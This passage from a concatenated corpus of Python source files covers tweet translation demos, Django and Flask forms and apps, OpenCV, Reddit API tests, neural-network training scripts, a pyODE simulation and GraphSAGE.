print("English sentence 11:", example_sentence_11)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_11))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_11, 10))
print(" ")
print(" ")
example_sentence_12 = "@apple Contact sync between Yosemite and iOS8 is seriously screwed up. It used to be much more stable in the past"
print("English sentence 12:", example_sentence_12)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_12))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_12, 10))
print(" ")
print(" ")
example_sentence_13 = "Can't stand those ppl with @Apple stickers everywhere."
print("English sentence 13:", example_sentence_13)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_13))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_13, 10))
print(" ")
print(" ")
example_sentence_14 = "As a die hard @Apple customer, I must say I am truly displeased with the customer service I was given today."
print("English sentence 14:", example_sentence_14)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_14))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_14, 10))
print(" ")
print(" ")
example_sentence_15 = "Just broke my 3rd charger of the month. Get your shit together @apple"
print("English sentence 15:", example_sentence_15)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_15))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_15, 10))
print(" ")
print(" ")
example_sentence_16 = "Yo @Apple fix your shitty iMessage"
print("English sentence 16:", example_sentence_16)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_16))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_16, 10))
print(" ")
print(" ")
example_sentence_17 = "@apple please get yourself together! I need my products to work!"
print("English sentence 17:", example_sentence_17)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_17))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_17, 10))
print(" ")
print(" ")
example_sentence_18 = "@Apple the no caller ID thing is scary as heck and I suggest you stop it"
print("English sentence 18:", example_sentence_18)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_18))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_18, 10))
print(" ")
print(" ")
example_sentence_19 = "@Apple tbh annoyed with Apple's shit at the moment"
print("English sentence 19:", example_sentence_19)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_19))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_19, 10))
example_sentence_20 = "Fair enough. But i have the Kindle2 and I think it's perfect :)"
print("English sentence 20:", example_sentence_20)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_20))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_20, 10))
print(" ")
print(" ")
example_sentence_21 = "how can you not love Obama? he makes jokes about himself."
print("English sentence 21:", example_sentence_21)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_21))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_21, 10))
print(" ")
print(" ")
example_sentence_22 = "Went to see the Star Trek movie last night. Very satisfying."
print("English sentence 22:", example_sentence_22)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_22))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_22, 10))
print(" ")
print(" ")
example_sentence_23 = "I hate the dentist....who invented them anyways?"
print("English sentence 23:", example_sentence_23)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_23))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_23, 10))
print(" ")
print(" ")
example_sentence_24 = "@ Safeway. Place is a nightmare right now. Bumming."
print("English sentence 24:", example_sentence_24)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_24))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_24, 10))
print(" ")
print(" ")
example_sentence_25 = "Reading the tweets coming out of Iran... The whole thing is terrifying and incredibly sad..."
print("English sentence 25:", example_sentence_25)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_25))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_25, 10))
print(" ")
print(" ")
example_sentence_26 = "with the boyfriend, eating a quesadilla"
print("English sentence 26:", example_sentence_26)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_26))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_26, 10))
print(" ")
print(" ")
example_sentence_27 = "Hate safeway select green tea icecream! bought two cartons, what a waste of money. "
print("English sentence 27:", example_sentence_27)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_27))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_27, 10))
print(" ")
print(" ")
example_sentence_28 = "I am furious with Time Warner and their phone promotions!"
print("English sentence 28:", example_sentence_28)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_28))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_28, 10))
print(" ")
print(" ")
example_sentence_29 = "is upset about the whole GM thing. life as i know it is so screwed up"
print("English sentence 29:", example_sentence_29)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_29))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_29, 10))
print(" ")
print(" ")
example_sentence_30 = "saw night at the museum out of sheer desperation. who is funding these movies?"
print("English sentence 30:", example_sentence_30)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_30))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_30, 10))
|
py | 1a4a1e3a2252f639ea26cab83840cc3068e88dfa | from django import forms
from django.contrib.auth.models import User
from .models import Agent
class AgentForm(forms.ModelForm) :
class Meta :
exclude = ('date_added', )
class AgentCreationForm(forms.Form) :
first_name = forms.CharField(label="First Name", required=True)
last_name = forms.CharField(label="Last Name", required=True)
password1 = forms.CharField(label="Password", required=True, widget=forms.PasswordInput, max_length=30)
password2 = forms.CharField(label="Password Confirm", required=True, widget=forms.PasswordInput, max_length=30)
email = forms.EmailField(label="Email address", required=True)
telephone = forms.IntegerField(label="Telephone", required=True)
description = forms.CharField(label="Description", required=True)
picture = forms.ImageField(label="Picture", required=True)
def clean(self):
form_data = self.cleaned_data
if form_data['password1'] != form_data.get('password2') :
self.add_error("password1", "Passwords must match")
self.add_error("password2", "Passwords must match")
del form_data['password1']
del form_data['password2']
return form_data
def save(self):
user = User.objects.create_user(
self.cleaned_data['email'],
email=self.cleaned_data['email'],
first_name=self.cleaned_data['first_name'],
last_name= self.cleaned_data['last_name']
)
user.set_password(self.cleaned_data['password1'])
user.save()
agent = Agent.objects.create(
user=user,
telephone=self.cleaned_data['telephone'],
description=self.cleaned_data['description'],
picture=self.cleaned_data['picture']
)
agent.save()
return agent
|
py | 1a4a1e67573717cac73a362fba05f32b02e65cfb |
from app import Application as app
HOST = "127.0.0.1"
PORT = 80
DEBUG = True
if __name__ == '__main__':
app.run(
host=HOST,
port=PORT,
debug=DEBUG
)
|
py | 1a4a1ea4587c388216855978c991074b8c03c453 | import csv
roberta=set(['100001', '100042', '100137', '100300', '100380', '100448', '100453', '100508', '100549', '100574', '100580', '100944', '100969', '100977', '100985', '101020', '101085', '101175', '101238', '101296', '101526', '101536', '101607', '101612', '101635', '101810', '101871', '101890', '101899', '101929', '101930', '101942', '102102', '102116', '102140', '102181', '102230', '102304', '102367', '102391', '102441', '102470', '102473', '102484', '102528', '102673', '102757', '102828', '102888', '102901', '102960'])
albert=set(['100000', '100001', '100191', '100409', '100448', '100508', '100549', '100574', '100624', '100921', '100944', '100969', '100977', '100985', '100998', '101085', '101099', '101175', '101238', '101296', '101417', '101429', '101439', '101488', '101519', '101557', '101567', '101586', '101612', '101630', '101638', '101769', '101805', '101834', '101846', '101890', '101929', '101930', '101942', '101990', '102074', '102102', '102103', '102116', '102181', '102304', '102391', '102441', '102470', '102474', '102522', '102545', '102673', '102757', '102828', '102889', '102901', '102936', '102949'])
both_wrong=albert&roberta
albert_right_roberta_wrong=roberta-albert
roberta_right_albert_wrong=albert-roberta
with open("roberta_right_albert_wrong",'w') as rrawf,\
open("albert_right_roberta_wrong",'w')as arrwf, open("5a_both_wrong",'w') as bwf,\
open("/mnt/minerva1/nlp/projects/counterfactual/semeval/5/Subtask-1-master/dev.csv") as refs:
lines_ref=[row for row in csv.reader(refs)]
for ref in lines_ref:
if ref[0] in both_wrong:
bwf.write(','.join(ref)+'\n')
if ref[0] in roberta_right_albert_wrong:
rrawf.write(','.join(ref)+'\n')
if ref[0] in albert_right_roberta_wrong:
arrwf.write(','.join(ref)+'\n') |
py | 1a4a1efd37063b61c73e85a54c88c3fd63d56bab | # -*- coding: utf-8 -*-
from flask import Blueprint, g, request
transfer_mod = Blueprint('transfer', __name__, static_folder='static')
from . import views
@transfer_mod.before_request
def set_current_channel():
g.current_channel = 'transfer'
|
py | 1a4a1f7628c9c3ec06933d6940a15cab63cdd6d8 | import cv2
import numpy as np
def main():
x = cv2.imread("x.jpg")
y = cv2.imread("y.jpg")
print(x[300,500])
print(y[300,500])
print(x[300,500]+y[300,500])
toplam = cv2.add(x,y)
cv2.imshow("toplam",toplam)
agirlikli_toplam = cv2.addWeighted(x,0.3,y,0.7,0)
cv2.imshow("ağırlıklı toplam",agirlikli_toplam)
print("X FOTO\nyükseklik : {}\ngenişlik : {}\nkanal sayısı : {}\n ".format(x.shape[0],x.shape[1],x.shape[2]))
print("Y FOTO\nyükseklik : {}\ngenişlik : {}\nkanal sayısı : {}\n ".format(y.shape[0], y.shape[1], y.shape[2]))
cv2.imshow("x.jpg",x)
cv2.imshow("y.jpg",y)
cv2.waitKey(0)
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
py | 1a4a21d86f73e4df4ca2e057a8ed9a1c9ea6f278 | """Test asyncpraw.models.user."""
from asynctest import mock
import pytest
from asyncpraw.exceptions import RedditAPIException
from asyncpraw.models import Multireddit, Redditor, Subreddit
from .. import IntegrationTest
class TestUser(IntegrationTest):
async def test_blocked(self):
self.reddit.read_only = False
with self.use_cassette():
blocked = await self.reddit.user.blocked()
assert len(blocked) > 0
assert all(isinstance(user, Redditor) for user in blocked)
async def test_contributor_subreddits(self):
self.reddit.read_only = False
with self.use_cassette():
count = 0
async for subreddit in self.reddit.user.contributor_subreddits():
assert isinstance(subreddit, Subreddit)
count += 1
assert count > 0
async def test_friends(self):
self.reddit.read_only = False
with self.use_cassette():
friends = await self.reddit.user.friends()
assert len(friends) > 0
assert all(isinstance(friend, Redditor) for friend in friends)
@mock.patch("asyncio.sleep", return_value=None)
async def test_friend_exist(self, _):
self.reddit.read_only = False
with self.use_cassette():
friend = await self.reddit.user.friends(user=await self.reddit.user.me())
assert isinstance(friend, Redditor)
@mock.patch("asyncio.sleep", return_value=None)
async def test_friend_not_exist(self, _):
self.reddit.read_only = False
with self.use_cassette():
with pytest.raises(RedditAPIException):
await self.reddit.user.friends(user="fake__user_user_user")
async def test_karma(self):
self.reddit.read_only = False
with self.use_cassette():
karma = await self.reddit.user.karma()
assert isinstance(karma, dict)
for subreddit in karma:
assert isinstance(subreddit, Subreddit)
keys = sorted(karma[subreddit].keys())
assert ["comment_karma", "link_karma"] == keys
async def test_me(self):
self.reddit.read_only = False
with self.use_cassette():
me = await self.reddit.user.me()
assert isinstance(me, Redditor)
me.praw_is_cached = True
me = await self.reddit.user.me()
assert me.praw_is_cached
@mock.patch("asyncio.sleep", return_value=None)
async def test_me__bypass_cache(self, _):
self.reddit.read_only = False
with self.use_cassette():
me = await self.reddit.user.me()
me.praw_is_cached = True
me = await self.reddit.user.me(use_cache=False)
assert not hasattr(me, "praw_is_cached")
async def test_multireddits(self):
self.reddit.read_only = False
with self.use_cassette():
multireddits = await self.reddit.user.multireddits()
assert isinstance(multireddits, list)
assert multireddits
assert all(isinstance(x, Multireddit) for x in multireddits)
async def test_subreddits(self):
self.reddit.read_only = False
with self.use_cassette():
count = 0
async for subreddit in self.reddit.user.subreddits():
assert isinstance(subreddit, Subreddit)
count += 1
assert count > 0
|
py | 1a4a224b12eb886e63027bd6382f82f3d37e933f | import hetu as ht
import models
import os
import numpy as np
import argparse
import json
import logging
from time import time
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
def print_rank0(msg):
if device_id == 0:
logger.info(msg)
if __name__ == "__main__":
# argument parser
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, required=True,
help='model to be tested')
parser.add_argument('--dataset', type=str, required=True,
help='dataset to be trained on')
parser.add_argument('--batch-size', type=int,
default=128, help='batch size')
parser.add_argument('--learning-rate', type=float,
default=0.1, help='learning rate')
parser.add_argument('--opt', type=str, default='sgd',
help='optimizer to be used, default sgd; sgd / momentum / adagrad / adam')
parser.add_argument('--num-epochs', type=int,
default=10, help='epoch number')
parser.add_argument('--gpu', type=int, default=0,
help='gpu to be used, -1 means cpu')
parser.add_argument('--validate', action='store_true',
help='whether to use validation')
parser.add_argument('--timing', action='store_true',
help='whether to time the training phase')
parser.add_argument('--comm-mode', default=None, help='communication mode')
args = parser.parse_args()
global device_id
device_id = 0
print_rank0("Training {} on HETU".format(args.model))
if args.comm_mode in ('AllReduce', 'Hybrid'):
comm, device_id = ht.mpi_nccl_init()
executor_ctx = ht.gpu(device_id % 8) if args.gpu >= 0 else ht.cpu(0)
else:
if args.gpu == -1:
executor_ctx = ht.cpu(0)
print_rank0('Use CPU.')
else:
executor_ctx = ht.gpu(args.gpu)
print_rank0('Use GPU %d.' % args.gpu)
if args.comm_mode in ('PS', 'Hybrid'):
settings_file = open(os.path.join(os.path.abspath(
os.path.dirname(__file__)), 'worker_conf%d.json' % args.gpu))
settings = json.load(settings_file)
for key in settings:
if type(settings[key]) == str:
os.environ[key] = settings[key]
else:
os.environ[key] = str(settings[key]) # type is str
assert args.model in ['alexnet', 'cnn_3_layers', 'lenet', 'logreg', 'lstm', 'mlp', 'resnet18', 'resnet34', 'rnn', 'vgg16', 'vgg19'], \
'Model not supported!'
model = eval('models.' + args.model)
assert args.dataset in ['MNIST', 'CIFAR10', 'CIFAR100', 'ImageNet']
dataset = args.dataset
assert args.opt in ['sgd', 'momentum', 'nesterov',
'adagrad', 'adam'], 'Optimizer not supported!'
if args.opt == 'sgd':
print_rank0('Use SGD Optimizer.')
opt = ht.optim.SGDOptimizer(learning_rate=args.learning_rate)
elif args.opt == 'momentum':
print_rank0('Use Momentum Optimizer.')
opt = ht.optim.MomentumOptimizer(learning_rate=args.learning_rate)
elif args.opt == 'nesterov':
print_rank0('Use Nesterov Momentum Optimizer.')
opt = ht.optim.MomentumOptimizer(
learning_rate=args.learning_rate, nesterov=True)
elif args.opt == 'adagrad':
print_rank0('Use AdaGrad Optimizer.')
opt = ht.optim.AdaGradOptimizer(
learning_rate=args.learning_rate, initial_accumulator_value=0.1)
else:
print_rank0('Use Adam Optimizer.')
opt = ht.optim.AdamOptimizer(learning_rate=args.learning_rate)
# data loading
print_rank0('Loading %s data...' % dataset)
if dataset == 'MNIST':
datasets = ht.data.mnist()
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
# train_set_x: (50000, 784), train_set_y: (50000, 10)
# valid_set_x: (10000, 784), valid_set_y: (10000, 10)
# x_shape = (args.batch_size, 784)
# y_shape = (args.batch_size, 10)
elif dataset == 'CIFAR10':
train_set_x, train_set_y, valid_set_x, valid_set_y = ht.data.normalize_cifar(
num_class=10)
if args.model == "mlp":
train_set_x = train_set_x.reshape(train_set_x.shape[0], -1)
valid_set_x = valid_set_x.reshape(valid_set_x.shape[0], -1)
# train_set_x: (50000, 3, 32, 32), train_set_y: (50000, 10)
# valid_set_x: (10000, 3, 32, 32), valid_set_y: (10000, 10)
# x_shape = (args.batch_size, 3, 32, 32)
# y_shape = (args.batch_size, 10)
elif dataset == 'CIFAR100':
train_set_x, train_set_y, valid_set_x, valid_set_y = ht.data.normalize_cifar(
num_class=100)
# train_set_x: (50000, 3, 32, 32), train_set_y: (50000, 100)
# valid_set_x: (10000, 3, 32, 32), valid_set_y: (10000, 100)
else:
raise NotImplementedError
# model definition
print_rank0('Building model {}'.format(args.model))
x = ht.dataloader_op([
ht.Dataloader(train_set_x, args.batch_size, 'train'),
ht.Dataloader(valid_set_x, args.batch_size, 'validate'),
])
y_ = ht.dataloader_op([
ht.Dataloader(train_set_y, args.batch_size, 'train'),
ht.Dataloader(valid_set_y, args.batch_size, 'validate'),
])
if args.model in ['resnet18', 'resnet34', 'vgg16', 'vgg19'] and args.dataset == 'CIFAR100':
loss, y = model(x, y_, 100)
else:
loss, y = model(x, y_)
train_op = opt.minimize(loss)
eval_nodes = {'train': [loss, y, y_, train_op], 'validate': [loss, y, y_]}
executor = ht.Executor(eval_nodes, ctx=executor_ctx,
comm_mode=args.comm_mode)
n_train_batches = executor.get_batch_num('train')
n_valid_batches = executor.get_batch_num('validate')
# training
print_rank0("Start training loop...")
running_time = 0
for i in range(args.num_epochs + 1):
print_rank0("Epoch %d" % i)
loss_all = 0
batch_num = 0
if args.timing:
start = time()
correct_predictions = []
for minibatch_index in range(n_train_batches):
loss_val, predict_y, y_val, _ = executor.run(
'train', eval_node_list=[loss, y, y_, train_op])
# Loss for this minibatch
predict_y = predict_y.asnumpy()
y_val = y_val.asnumpy()
loss_all += loss_val.asnumpy()
batch_num += 1
# Predict accuracy for this minibatch
correct_prediction = np.equal(
np.argmax(y_val, 1),
np.argmax(predict_y, 1)).astype(np.float32)
correct_predictions.extend(correct_prediction)
loss_all /= batch_num
accuracy = np.mean(correct_predictions)
print_rank0("Train loss = %f" % loss_all)
print_rank0("Train accuracy = %f" % accuracy)
if args.timing:
end = time()
during_time = end - start
print_rank0("Running time of current epoch = %fs" % (during_time))
if i != 0:
running_time += during_time
if args.validate:
val_loss_all = 0
batch_num = 0
correct_predictions = []
for minibatch_index in range(n_valid_batches):
loss_val, valid_y_predicted, y_val = executor.run(
'validate', eval_node_list=[loss, y, y_], convert_to_numpy_ret_vals=True)
val_loss_all += loss_val
batch_num += 1
correct_prediction = np.equal(
np.argmax(y_val, 1),
np.argmax(valid_y_predicted, 1)).astype(np.float32)
correct_predictions.extend(correct_prediction)
val_loss_all /= batch_num
accuracy = np.mean(correct_predictions)
print_rank0("Validation loss = %f" % val_loss_all)
print_rank0("Validation accuracy = %f" % accuracy)
print_rank0("*"*50)
print_rank0("Running time of total %d epoch = %fs" %
(args.num_epochs, running_time))
if args.comm_mode in ('AllReduce', 'Hybrid'):
ht.mpi_nccl_finish(comm)
|
py | 1a4a2266a3876d173bf9c16b1b75d978db0c182e | from django import forms
from django.contrib.auth.models import Group, User
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from django.urls import reverse_lazy
from django.utils.text import format_lazy
from django.utils.translation import gettext_lazy as _
from accounts.models import UserAttributes
from .models import Permission
class GroupForm(forms.ModelForm):
permissions = forms.ModelMultipleChoiceField(
widget=forms.CheckboxSelectMultiple,
queryset=Permission.objects.filter(content_type__model='permissionset'),
required=False,
)
users = forms.ModelMultipleChoiceField(
widget=forms.CheckboxSelectMultiple,
queryset=User.objects.all(),
required=False,
)
def __init__(self, *args, **kwargs):
super(GroupForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
if instance and instance.id:
self.fields['users'].initial = self.instance.user_set.all()
def save_m2m(self):
self.instance.user_set.set(self.cleaned_data['users'])
def save(self, *args, **kwargs):
instance = super(GroupForm, self).save()
self.save_m2m()
return instance
class Meta:
model = Group
fields = '__all__'
class UserForm(forms.ModelForm):
user_permissions = forms.ModelMultipleChoiceField(
widget=forms.CheckboxSelectMultiple,
queryset=Permission.objects.filter(content_type__model='permissionset'),
label=_('Permissions'),
required=False,
)
groups = forms.ModelMultipleChoiceField(
widget=forms.CheckboxSelectMultiple,
queryset=Group.objects.all(),
label=_('Groups'),
required=False,
)
class Meta:
model = User
fields = [
'username',
'groups',
'first_name',
'last_name',
'email',
'user_permissions',
'is_staff',
'is_active',
'is_superuser',
]
def __init__(self, *args, **kwargs):
super(UserForm, self).__init__(*args, **kwargs)
if self.instance.id:
password = ReadOnlyPasswordHashField(
label=_("Password"),
help_text=format_lazy(_("""Raw passwords are not stored, so there is no way to see
this user's password, but you can change the password using <a href='{}'>this form</a>."""),
reverse_lazy('admin:user_update_password',
args=[self.instance.id,]))
)
self.fields['Password'] = password
class UserCreateForm(UserForm):
password = forms.CharField(widget=forms.PasswordInput)
class Meta:
model = User
fields = [
'username',
'password',
'groups',
'first_name',
'last_name',
'email',
'user_permissions',
'is_staff',
'is_active',
'is_superuser',
]
class UserAttributesForm(forms.ModelForm):
class Meta:
model = UserAttributes
exclude = ['user', 'can_clone_instances']
|
py | 1a4a228b389a69dd885dc47358fa589ae08a8f23 | #!/usr/bin/env python
# http://pyode.sourceforge.net/tutorials/tutorial2.html
# pyODE example 2: Connecting bodies with joints
# modified by Gideon Klompje (removed literals and using
# 'ode.Mass.setSphereTotal' instead of 'ode.Mass.setSphere')
import ode
import pygame
from pygame.locals import QUIT, KEYDOWN
# Constants
WINDOW_RESOLUTION = (640, 480)
DRAW_SCALE = WINDOW_RESOLUTION[0] / 5
"""Factor to multiply physical coordinates by to obtain screen size in pixels"""
DRAW_OFFSET = (WINDOW_RESOLUTION[0] / 2, 50)
"""Screen coordinates (in pixels) that map to the physical origin (0, 0, 0)"""
BACKGROUND_COLOR = (255, 255, 255)
GRAVITY = (0, -9.81, 0)
SPHERE1_POSITION = (1, 0, 0)
SPHERE1_MASS = 1
SPHERE1_RADIUS = 0.15
SPHERE1_COLOR = (55, 0, 200)
SPHERE2_POSITION = (2, 0, 0)
SPHERE2_MASS = 1
SPHERE2_RADIUS = 0.15
SPHERE2_COLOR = (55, 0, 200)
JOINT1_ANCHOR = (0, 0, 0)
JOINT1_COLOR = (200, 0, 55)
JOINT1_WIDTH = 2
"""Width of the line (in pixels) representing the joint"""
JOINT2_ANCHOR = SPHERE1_POSITION
JOINT2_COLOR = (200, 0, 55)
JOINT2_WIDTH = 2
"""Width of the line (in pixels) representing the joint"""
TIME_STEP = 0.04
# Utility functions
def coord(x, y, integer=False):
"""
Convert world coordinates to pixel coordinates. Setting 'integer' to
True will return integer coordinates.
"""
xs = (DRAW_OFFSET[0] + DRAW_SCALE*x)
ys = (DRAW_OFFSET[1] - DRAW_SCALE*y)
if integer:
return int(round(xs)), int(round(ys))
else:
return xs, ys
# Initialize pygame
pygame.init()
# Open a display
screen = pygame.display.set_mode(WINDOW_RESOLUTION)
# Create a world object
world = ode.World()
world.setGravity(GRAVITY)
# Create two bodies
body1 = ode.Body(world)
M = ode.Mass()
M.setSphereTotal(SPHERE1_MASS, SPHERE1_RADIUS)
body1.setMass(M)
body1.setPosition(SPHERE1_POSITION)
body2 = ode.Body(world)
M = ode.Mass()
M.setSphereTotal(SPHERE2_MASS, SPHERE2_RADIUS)
body2.setMass(M)
body2.setPosition(SPHERE2_POSITION)
# Connect body1 with the static environment
j1 = ode.BallJoint(world)
j1.attach(body1, ode.environment)
j1.setAnchor(JOINT1_ANCHOR)
# Connect body2 with body1
j2 = ode.BallJoint(world)
j2.attach(body1, body2)
j2.setAnchor(JOINT2_ANCHOR)
# Simulation loop...
if __name__ == "__main__":
fps = 1.0 / TIME_STEP
clk = pygame.time.Clock()
sph1_rad = int(DRAW_SCALE * SPHERE1_RADIUS)
sph2_rad = int(DRAW_SCALE * SPHERE2_RADIUS)
loopFlag = True
while loopFlag:
for e in pygame.event.get():
if e.type==QUIT:
loopFlag=False
if e.type==KEYDOWN:
loopFlag=False
# Clear the screen
screen.fill(BACKGROUND_COLOR)
# Draw the two bodies and the lines representing the joints
x1, y1, z1 = body1.getPosition()
x2, y2, z2 = body2.getPosition()
xj1, yj1, zj1 = j1.getAnchor()
xj2, yj2, zj2 = j2.getAnchor()
pygame.draw.line(screen, JOINT1_COLOR, coord(xj1, yj1), coord(x1, y1), JOINT1_WIDTH)
pygame.draw.line(screen, JOINT2_COLOR, coord(xj2, yj2), coord(x2, y2), JOINT2_WIDTH)
pygame.draw.circle(screen, SPHERE1_COLOR, coord(x1, y1, integer=True), sph1_rad, 0)
pygame.draw.circle(screen, SPHERE2_COLOR, coord(x2, y2, integer=True), sph2_rad, 0)
pygame.display.flip()
# Next simulation step
world.step(TIME_STEP)
# Try to keep the specified framerate
clk.tick(fps)
|
py | 1a4a22eea78b91f31105d6c77b84686d5bd1f275 | """
Inductive Representation Learning on Large Graphs
Paper: http://papers.nips.cc/paper/6703-inductive-representation-learning-on-large-graphs.pdf
Code: https://github.com/williamleif/graphsage-simple
Simple reference implementation of GraphSAGE.
"""
import argparse
import time
import abc
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from dgl import DGLGraph
from dgl.data import register_data_args, load_data
from dgl.nn.pytorch.conv import SAGEConv
class GraphSAGE(nn.Module):
def __init__(self,
g,
in_feats,
n_hidden,
n_classes,
n_layers,
activation,
dropout,
aggregator_type):
super(GraphSAGE, self).__init__()
self.layers = nn.ModuleList()
self.g = g
# input layer
self.layers.append(SAGEConv(in_feats, n_hidden, aggregator_type, feat_drop=dropout, activation=activation))
# hidden layers
for i in range(n_layers - 1):
self.layers.append(SAGEConv(n_hidden, n_hidden, aggregator_type, feat_drop=dropout, activation=activation))
# output layer
self.layers.append(SAGEConv(n_hidden, n_classes, aggregator_type, feat_drop=dropout, activation=None)) # activation None
def forward(self, features):
h = features
for layer in self.layers:
h = layer(self.g, h)
return h
def evaluate(model, features, labels, mask):
model.eval()
with torch.no_grad():
logits = model(features)
logits = logits[mask]
labels = labels[mask]
_, indices = torch.max(logits, dim=1)
correct = torch.sum(indices == labels)
return correct.item() * 1.0 / len(labels)
def main(args):
# load and preprocess dataset
data = load_data(args)
features = torch.FloatTensor(data.features)
labels = torch.LongTensor(data.labels)
train_mask = torch.ByteTensor(data.train_mask)
val_mask = torch.ByteTensor(data.val_mask)
test_mask = torch.ByteTensor(data.test_mask)
in_feats = features.shape[1]
n_classes = data.num_labels
n_edges = data.graph.number_of_edges()
print("""----Data statistics------'
#Edges %d
#Classes %d
#Train samples %d
#Val samples %d
#Test samples %d""" %
(n_edges, n_classes,
train_mask.sum().item(),
val_mask.sum().item(),
test_mask.sum().item()))
if args.gpu < 0:
cuda = False
else:
cuda = True
torch.cuda.set_device(args.gpu)
features = features.cuda()
labels = labels.cuda()
train_mask = train_mask.cuda()
val_mask = val_mask.cuda()
test_mask = test_mask.cuda()
print("use cuda:", args.gpu)
# graph preprocess and calculate normalization factor
g = data.graph
g.remove_edges_from(g.selfloop_edges())
g = DGLGraph(g)
n_edges = g.number_of_edges()
# create GraphSAGE model
model = GraphSAGE(g,
in_feats,
args.n_hidden,
n_classes,
args.n_layers,
F.relu,
args.dropout,
args.aggregator_type
)
if cuda:
model.cuda()
loss_fcn = torch.nn.CrossEntropyLoss()
# use optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)
# initialize graph
dur = []
for epoch in range(args.n_epochs):
model.train()
if epoch >= 3:
t0 = time.time()
# forward
logits = model(features)
loss = loss_fcn(logits[train_mask], labels[train_mask])
optimizer.zero_grad()
loss.backward()
optimizer.step()
if epoch >= 3:
dur.append(time.time() - t0)
acc = evaluate(model, features, labels, val_mask)
print("Epoch {:05d} | Time(s) {:.4f} | Loss {:.4f} | Accuracy {:.4f} | "
"ETputs(KTEPS) {:.2f}".format(epoch, np.mean(dur), loss.item(),
acc, n_edges / np.mean(dur) / 1000))
print()
acc = evaluate(model, features, labels, test_mask)
print("Test Accuracy {:.4f}".format(acc))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='GraphSAGE')
register_data_args(parser)
parser.add_argument("--dropout", type=float, default=0.5,
help="dropout probability")
parser.add_argument("--gpu", type=int, default=-1,
help="gpu")
parser.add_argument("--lr", type=float, default=1e-2,
help="learning rate")
parser.add_argument("--n-epochs", type=int, default=200,
help="number of training epochs")
parser.add_argument("--n-hidden", type=int, default=16,
help="number of hidden gcn units")
parser.add_argument("--n-layers", type=int, default=1,
help="number of hidden gcn layers")
parser.add_argument("--weight-decay", type=float, default=5e-4,
help="Weight for L2 loss")
parser.add_argument("--aggregator-type", type=str, default="gcn",
help="Aggregator type: mean/gcn/pool/lstm")
args = parser.parse_args()
print(args)
main(args)
|
py | 1a4a23c9846ff482afa454292363724ca0cac02a | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for multivariate von Mises-Fisher distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.distributions.von_mises_fisher import _bessel_ive
from tensorflow_probability.python.internal import test_util as tfp_test_util
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import,g-import-not-at-top
@test_util.run_all_in_graph_and_eager_modes
class VonMisesFisherTest(tfp_test_util.VectorDistributionTestHelpers,
